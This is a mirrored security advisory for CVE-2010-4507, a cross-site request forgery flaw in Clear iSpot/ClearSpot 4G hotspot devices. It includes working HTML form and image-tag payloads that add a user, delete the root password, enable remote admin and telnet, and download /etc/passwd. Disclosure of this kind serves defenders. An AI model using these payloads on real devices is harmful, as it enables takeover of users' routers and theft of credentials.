Clear iSpot/Clearspot CSRF Vulnerabilities

🗓️ 13 Dec 2010 00:00:00Reported by BraniXType

zdt🔗 0day.today👁 28 Views

Clearspot and iSpot CSRF Vulnerabilities on Versions 2.0.0.

Reporter	Title	Published	Views	Family All 12
Circl	CVE-2010-4507	12 Dec 201000:00	–	circl
CVE	CVE-2010-4507	30 Dec 201018:00	–	cve
Cvelist	CVE-2010-4507	30 Dec 201018:00	–	cvelist
Exploit DB	Clear iSpot/Clearspot 2.0.0.0 - Cross-Site Request Forgery	12 Dec 201000:00	–	exploitdb
EUVD	EUVD-2010-4475	7 Oct 202500:30	–	euvd
exploitpack	Clear iSpotClearspot 2.0.0.0 - Cross-Site Request Forgery	12 Dec 201000:00	–	exploitpack
NVD	CVE-2010-4507	30 Dec 201019:00	–	nvd
Packet Storm	Clear iSpot / Clearspot 2.0.0.0 Cross Site Request Forgery	11 Dec 201000:00	–	packetstorm
Prion	Cross site request forgery (csrf)	30 Dec 201019:00	–	prion
securityvulns	TWSL-2010-008: Clear iSpot/Clearspot CSRF Vulnerabilities	15 Dec 201000:00	–	securityvulns

Published: 2010-12-10 Version: 1.0
 
Vendor: Clear (http://www.clear.com <http://www.clear.com/>)
Products: iSpot / ClearSpot 4G (http://www.clear.com/devices)
Versions affected:
The observed behavior the result of a design choice, and may be present
on multiple versions. The specific versions used during testing are
given below.
 
iSpot version:           2.0.0.0 [R1679 (Jul 6 2010 17:57:37)]
Clearspot versions:      2.0.0.0 [R1512 (May 31 2010 18:57:09)]
                         2.0.0.0 [R1786 (Aug 4 2010 20:09:06)]
Firmware Version :       1.9.9.4
Hardware Version :       R051.2
Device Name :            IMW-C615W
Device Manufacturer :    INFOMARK (http://infomark.co.kr
<http://infomark.co.kr/>)
 
Product Description:
iSpot and ClearSpot 4G are portable 4G devices, that allow users to share
and broadcast their own personal WiFi network. The device connects up to 8
clients at the same time, on the same 4G connection.
 
Credit: Matthew Jakubowski of Trustwave's SpiderLabs
 
CVE: CVE-2010-4507
 
Finding:
These devices are susceptible to Cross-Site Request Forgery (CSRF).
An attacker that is able to coerce a ClearSpot / iSpot user into
following a link can arbitrarily execute system commands on the device.
 
The following examples will allow an attacker to enable remote access to
the
iSpot and ClearSpot 4G, and add their own account to the device. This level
of access also provides a device's client-side SSL certificates, which are
used to perform device authentication. This could lead to a compromise of
ClearWire accounts as well as other personal information.
 
Add new user:
<form method="post" action="http://server/cgi-bin/webmain.cgi";
<http://192.168.1.1/cgi-bin/webmain.cgi%22>>
<input type="hidden" name="act" value="act_cmd_result">
<input type="hidden" name="cmd" value="adduser -S jaku">
<input type="submit">
</form>
 
or
 
<img
src='http://server/cgi-bin/webmain.cgi?act=act_cmd_result&cmd=adduser%
20-S%20jaku'>
 
Remove root password:
<form method="post" action="http://server/cgi-bin/webmain.cgi";
<http://192.168.1.1/cgi-bin/webmain.cgi%22>>
<input type="hidden" name="act" value="act_cmd_result">
<input type="hidden" name="cmd" value="passwd -d root">
<input type="submit">
</form>
 
or
 
<img
src='http://server/cgi-bin/webmain.cgi?act=act_cmd_result&cmd=passwd%2
0-d%20root'>
 
Enable remote administration access:
<form method="post" action="http://server/cgi-bin/webmain.cgi";
<http://server/cgi-bin/webmain.cgi%22>>
<input type="hidden" name="act" value="act_network_set">
<input type="hidden" name="enable_remote_access" value="YES">
<input type="hidden" name="remote_access_port" value="80">
<input type="submit">
</form>
 
or
 
<img
src='http://server/cgi-bin/webmain.cgi?act=act_network_set&enable_remo
te_access=YES&remote_access_port=80'>
 
Enable telnet if not already enabled:
 
<form method="post" action="http://server/cgi-bin/webmain.cgi";
<http://server/cgi-bin/webmain.cgi%22>>
<input type="hidden" name="act" value="act_set_wimax_etc_config">
<input type="hidden" name="ENABLE_TELNET" value="YES">
<input type="submit">
</form>
 
or
 
<img
src='http://server/cgi-bin/webmain.cgi?act=act_set_wimax_etc_config&EN
ABLE_TELNET=YES'>
 
Allow remote telnet access:
<form method="post" action="http://server/cgi-bin/webmain.cgi";
<http://server/cgi-bin/webmain.cgi%22>>
<input type="hidden" name="act" value="act_network_set">
<input type="hidden" name="add_enable" value="YES">
<input type="hidden" name="add_host_ip" value="1">
<input type="hidden" name="add_port" value="23">
<input type="hidden" name="add_protocol" value="BOTH">
<input type="hidden" name="add_memo" value="admintelnet">
<input type="submit">
</form>
 
or
 
<img
src='http://server/cgi-bin/webmain.cgi?act=act_network_set&add_enable=
YES&add_host_ip=1&add_port=23&add_protocol=both&add_memo=admintelnet'>
 
Once compromised, it is possible to download any file from the devices
using
the following method.
 
Download /etc/passwd file:
<form method="post" action="http://server/cgi-bin/upgrademain.cgi
<http://server/cgi-bin/upgrademain.cgi> ">
<input type="hidden" name="act" value="act_file_download">
<input type="hidden" name="METHOD" value="PATH">
<input type="hidden" name="FILE_PATH" value="/etc/passwd">
<input type="submit">
</form>
 
or
 
<img
src='http://server/cgi-bin/upgrademain.cgi?act=act_file_download&METHO
D=PATH&FILE_PATH=/etc/passwd'>
 
Vendor Response:
No official response is available at the time of release.
 
Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.
 
Vendor Communication Timeline:
8/26/10 - Vendor contact initiated.
9/30/10 - Vulnerability details provided to vendor.
12/3/10 - Notified vendor of release date. No workaround or patch provided.
12/10/10 - Advisory published.



#  0day.today [2018-01-01]  #

13 Dec 2010 00:00Current

7.1High risk

Vulners AI Score7.1

EPSS0.0019